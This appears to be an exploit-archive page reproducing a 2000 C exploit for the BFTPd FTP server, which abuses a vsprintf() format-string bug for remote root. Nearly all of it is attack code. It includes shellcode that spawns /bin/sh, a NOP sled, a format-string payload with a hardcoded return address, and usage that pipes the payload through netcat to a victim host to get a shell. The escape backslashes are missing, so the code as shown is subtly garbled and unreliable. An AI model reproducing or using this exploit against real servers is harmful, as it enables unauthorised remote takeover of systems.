[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : BFTPd vsprintf() Format Strings Exploit
# Published : 2000-11-29
# Author : DiGiT
# Previous Title : Solaris sadmind Remote Buffer Overflow Exploit
# Next Title : wu-ftpd 2.6.0 Remote Root Exploit
*
* Copyright (c) 2000 - Security.is
*
* The following material may be freely redistributed, provided
* that the code or the disclaimer have not been partly removed,
* altered or modified in any way. The material is the property
* of security.is. You are allowed to adopt the represented code
* in your programs, given that you give credits where it's due.
*
* A no-name ftp-server has a serious bug which leads to remote root.
* Anyway, we exploit vsprintf() via format-string.
*
* Discovered/coded by: DiGiT - teddi@linux.is
* Greets: security.is, ADM
* note: Coded during security.is weekend ;>
*
* Run like: (./bftpexp ; cat) | nc bftpd.victim.com 21
* offset is optional and is arg1
*
*/
#include <stdio.h>
char shellcode[] =
"x31xc0x31xdbx04x0bxcdx80x31xc0x40x40xcdx80x85"
"xc0x75x28x89xd9x31xc0x41x04x3fxcdx80x31xc0x04"
"x3fx41xebx1fx31xc0x5fx89x7fx08x88x47x07x89x47"
"x0cx89xfbx8dx4fx08x8dx57x0cx04x0bxcdx80x31xc0"
"x31xdbx40xcdx80xe8xdcxffxffxff/bin/sh";
#define ADDR 0xbffff83c
int main(int argc, char *argv[])
{
char lenbuf[1024],nopbuf[256], addrbuf[32], buf[256];
int offset=0,length, nopcount=100,i;
long nop_addr = ADDR;
if(argc > 1)
offset = atoi(argv[1]);
memset (nopbuf, 'x90', nopcount);
nop_addr = nop_addr + offset;
strcpy(buf, nopbuf);
strcat(buf, shellcode);
length=1024-strlen(shellcode)-nopcount+4-14;
strcat(buf, "%.");
sprintf(lenbuf, "%dd", length);
strcat(buf, lenbuf);
sprintf(addrbuf, "%c%c%c%c",
(unsigned char) ((nop_addr >> 0) & 0xff),
(unsigned char) ((nop_addr >> 8) & 0xff),
(unsigned char) ((nop_addr >> 16) & 0xff),
(unsigned char) ((nop_addr >> 24) & 0xff));
for(i = 0 ; i < 4 ; i++)
strcat(buf, addrbuf);
fprintf(stderr, "Bftpd remote exploit, by DiGiTn");
fprintf(stderr, "Using Address = 0x%xn", nop_addr);
printf("%sn", buf);
return 0;
}
// www.Syue.com [2000-11-29]